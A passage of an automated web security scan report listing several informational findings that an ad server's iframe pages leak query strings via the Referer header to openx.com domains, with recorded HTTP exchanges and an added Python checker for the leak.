Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0045.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:28 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600958_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPIDiBHqwQ6iQg2oRKgRvSBinBICmBqq0Hx93RLlB7pa7cysZmcRCXxBoSSCui4mkLoiQASLDSZUQmzDIAg2HnF8BDG1p5jXLEQwZtuD8DL2V6EfvqzMzJCyLF7VK2XgGgLgKJ1c19VnQuH
...[SNIP]...
hfkrz4LnLepo9D9mTbzTyPFmEWjkzXYNZVLRegRjksQKjeLKuTBmNjTJGWJy2nxiKhAy3s3dQgz7VRnot-tTgafh4mqedSV0Ot-nL46o9Sl43U0hg6JYzjB55icoI=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600958_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600958_HERE" border="0" alt="">
</a>
...[SNIP]...

19.74. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfX7QfmeDRCvbPH57LuELEBGqvaKm7IBeQzdYHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3684300767%26r%3D0%26s%3D2126909,4adc3378-ed53-11e0-bdd4-78e7d15fdc94,1317600281512 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:41 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0112.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:41 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600281_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGljWFrgzAQhn-N3yQkMbEW2YfYYJE1ZQ5pmV9EkzhLq-mio8Vfv2zd.AM7jrv3PZ67Q0HcEklRA2uoG9WqUMUowHKFIknJ2odxHGOC6QqHmEJ.zBLFOIIZ2xxlmLOf4Gv-.FCu8ojl2cO9RAzcOADEWHF7jD5
...[SNIP]...
hSFuosikPvOLpfFtmT73fTdPUC5uHUpQKTrZW-A3PVwx1I07th3Vpw7RyUWt1aPXZewAn0cDibQZ-UcyFF3142Tp-GUdupsvWgTF8Nn32jbdVpqx1wMdIRX3Mvc5c=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600281_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600281_HERE" border="0" alt="">
</a>
...[SNIP]...

19.75. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACR1LAcI-DRCphMPlklk7jLbEnRvvtGSzBTzJ5ZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D766431961%26r%3D0%26s%3D2126909,0474a802-ed53-11e0-8881-2f73f980d1ce,1317600163393 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0111.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:13 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600163_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9FqhDAQ.BrfJCSaakT6EC8VbE.tFenRexE1Ua89jY0WrV.fcB73A12W3ZlhdmCR7ROvRASV2PaKshSe5SPbqlzkOtwqTOj7PkYedl0CiWuOUcApQzCiu6fKOdBrMY-9bEhPRuhBbuyVUDAzALBU8bxJ3zG
...[SNIP]...
bMJxZ-nm4v6ftH02ynaTBsalihbg4mVXCxADmIfgGV7LRY1AoMrTaFStRKjK1hMwwNy1llL85cM-cBeppXpcbnfhRqylXRc9nl.U9XCpW3QgltuMhKO.4A.p9zpA==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600163_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600163_HERE" border="0" alt="">
</a>
...[SNIP]...

19.76. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACDXCQRkeHRCvqpWfmi8NK.ACjreW7rGfGvgYOUAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3491581095%26r%3D0%26s%3D2126909,deb80d06-ed53-11e0-ad42-78e7d1f5c942,1317600529578 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0295.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:50 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600529_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNFugzAMRb-GNxQlBGgR2kNo1gmtmdYJrYIXRBNTurakC0ywfv2igvoDsyz7Xuv6EBrXQUigAkoVBhlVNCbUkwsiI0Kxi-M4posooBENfbdLE8U4wSlbPctwy-7FI.46KTv5km315N6XDA0cIV8bMUynb7H
...[SNIP]...
okdjnJbycsZo79f3Ldpu-vDmWOt7atUG8qBSPSV2hHJPXFHqvaoGtjQ2sDtYGucSj3seOFN93CUVkXBjiyXu6tPrYdmL40Vav0pWx.LnswZQMGbOCspU38ATXBc.M=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600529_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600529_HERE" border="0" alt="">
</a>
...[SNIP]...

19.77. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkMCV9Y-TRCprvrXcs8nJnK49wH2xEJffG.vUBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3001353421%26r%3D0%26s%3D2126909,8d0fe198-ed55-11e0-915e-78e7d1f5d916,1317601251574 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:53 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0080.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:53 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601251_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLBvIR6MLGoUOOokWhQuSCwnRLxMDVUQfn6uiXKD2S12p0Zzc4iN.ZqWQsBQx41CCPoxch1eOAEUeSENozjGDsB9AyNkD1niSAUwYzsCu4fyX.RiL5tyEwakmO2sfeQgCsFACvNrpv0zUL
...[SNIP]...
eKT1TSbj3cc8z9i223yzJZLrGc1LQAi66FXIGa5LgCrgYj1mcNptaYUi3PWs6t5VIMLce.qVFehGG-h.44bwy-jLPUS6XrUaihGn-GRuqqlVoaQ6-4cfwCl4ZzMw==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601251_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601251_HERE" border="0" alt="">
</a>
...[SNIP]...

19.78. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwKNDZn-DRCqG9mY-4eQtB0RJtQeGno1w8e5joAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2882591152%26r%3D0%26s%3D2126909,4e2c644e-ed53-11e0-aed4-78e7d1f549f4,1317600287071 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:47 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0336.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:47 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600287_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTF1rgzAU.TW-SchNrFVkD7FZQdbIHDLXvhRN0lmqpksdlf76hTn8A7tc7vng3AM0qcNIwYoqAkAb1awToESuIVK1BB8nSQJRQAlgElL.lqWKccAZ2zzLsGC.w2P-MjN3ecQKM6vXiKE7RygwVtxn60tEeIn
...[SNIP]...
VUe8h51-fLI3vy.XYcrx5lHtm6VWi0tdITMlc9TEia3pn1yaJr60Jbq09W31qP8gB7JHyYQZ-VU-EKx07LxvHzcNN2PNp6UKY.Dt99o-2x1Va7QGekS.wAvLZzHA==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600287_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600287_HERE" border="0" alt="">
</a>
...[SNIP]...
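
The /iframe3 entries in this section (19.68 onward) all record the same condition: the frame was requested with a query string (the long opaque blob, the d.tradex.openx.com URL, the _salt value and a timestamp) and the returned markup references psa-d.openx.com or pagead2.googlesyndication.com, so a browser using the legacy referrer behaviour forwards that query string in the Referer header to those domains. The following Python is an added example, not part of the XSS.CX report or of the scanner that produced it. It re-runs that check over a constructed request/response pair modelled on, and shortened from, the exchanges recorded here, and additionally honours a Referrer-Policy response header, which the scanner output on this page does not consider. The sample exchange is constructed; hostnames are compared exactly, which is an assumption about how the scanner matches domains, and a `<meta name="referrer">` tag is not checked.

```python
import re
from urllib.parse import urlsplit

# Constructed sample exchange, modelled on (and shortened from) the /iframe3
# request/response pairs recorded above.  It is not the page's own data.
SAMPLE_REQUEST = (
    "GET /iframe3?sIBdAD10IAC,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php,1317600618 HTTP/1.1\r\n"
    "Host: ad.yieldmanager.com\r\n"
    "Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Cache-Control: no-store\r\n"
    "\r\n"
    '<html><body><noscript><iframe id="4e3c55af5608c" '
    'src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600618_HERE" width="160" height="600">'
    # The click URL stays on ad.yieldmanager.com; the openx URL inside it is only a parameter.
    '<a href="http://ad.yieldmanager.com/clk?3,eAGlTtFu,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c" >'
    '<img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600618_HERE" border="0" alt="">'
    "</a></noscript>"
    '<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>'
    '<a href="/clk?local=1">relative link, same origin</a></body></html>'
)

_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
_LINK_ATTR = re.compile(r"""\b(?:src|href)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
# Referrer-Policy values that keep path and query out of cross-origin requests.
_QUERY_STRIPPING_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


def split_message(raw):
    """Split a raw HTTP message into (start line, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def request_url(raw_request, scheme="http"):
    """Rebuild the absolute URL the browser asked for from request line + Host header."""
    start, headers, _ = split_message(raw_request)
    m = _REQUEST_LINE.match(start)
    if not m:
        raise ValueError("not an HTTP request line: %r" % start)
    return "%s://%s%s" % (scheme, headers["host"], m.group("target"))


def cross_domain_links(body, page_host):
    """Absolute src/href URLs in body whose host differs from page_host.

    Relative URLs resolve to the page's own origin and are skipped.  A URL that only
    carries another host inside its query (the /clk? redirect above) is same-domain:
    the Referer goes to ad.yieldmanager.com, which then forwards the user.  Hosts are
    compared exactly (an assumption; the scanner's matching is not documented here)."""
    found = set()
    for url in _LINK_ATTR.findall(body):
        parts = urlsplit(url)
        if parts.scheme in ("http", "https") and parts.hostname and parts.hostname != page_host:
            found.add(url)
    return sorted(found)


def policy_strips_query(policy):
    """True if this Referrer-Policy keeps the query string from leaving the origin.
    None models the legacy default (no-referrer-when-downgrade: full URL sent over http)
    that the Chrome 14 client in these requests used; current browsers default to
    strict-origin-when-cross-origin instead."""
    return policy is not None and policy.strip().lower() in _QUERY_STRIPPING_POLICIES


def check_referer_leak(raw_request, raw_response):
    """Re-run the scanner's check on one recorded exchange and return the verdict."""
    url = request_url(raw_request)
    page = urlsplit(url)
    _, headers, body = split_message(raw_response)
    links = cross_domain_links(body, page.hostname)
    policy = headers.get("referrer-policy")  # <meta name="referrer"> is not checked here
    return {
        "url": url,
        "has_query": bool(page.query),
        "cross_domain_links": links,
        "cross_domain_hosts": sorted({urlsplit(u).hostname for u in links}),
        "referrer_policy": policy,
        "leaks_query_in_referer": bool(page.query) and bool(links) and not policy_strips_query(policy),
    }


if __name__ == "__main__":
    verdict = check_referer_leak(SAMPLE_REQUEST, SAMPLE_RESPONSE)
    print(verdict["leaks_query_in_referer"], verdict["cross_domain_hosts"])
```

Run against the constructed sample, the verdict lists pagead2.googlesyndication.com and psa-d.openx.com as recipients of the query string and flags the leak; adding `Referrer-Policy: strict-origin-when-cross-origin` (or `no-referrer`) to the response clears it, while `unsafe-url` or `no-referrer-when-downgrade` does not. For the recorded ad responses the practical fix is on the serving side (a Referrer-Policy header, or not carrying tracking state in the query string of a frame that embeds third-party resources); nothing in the report shows such a header being sent.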

19.79. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD9FGF46uDRCkzLqfRrhkjU6-2Y8g8Cm5cleGR8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3106932746%26r%3D0%26s%3D2126909,7b34a5d2-ed53-11e0-bf3f-78e7d1f5c93e,1317600362623 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:03 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600362_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT2FrgzAQ.TV-k5AYpxbZh9ggyBqZQybtl6JJnM5qXHTY-euXzdI.0OO4e-94945DOETQr6ATuByLqsaeHyLscB-V0MXchmEYIifYYew6nj0lkSAUwYTsC-5l5D.ojr5syFQakCzZ2GtAwEIBcJVmyzb6YgG
...[SNIP]...
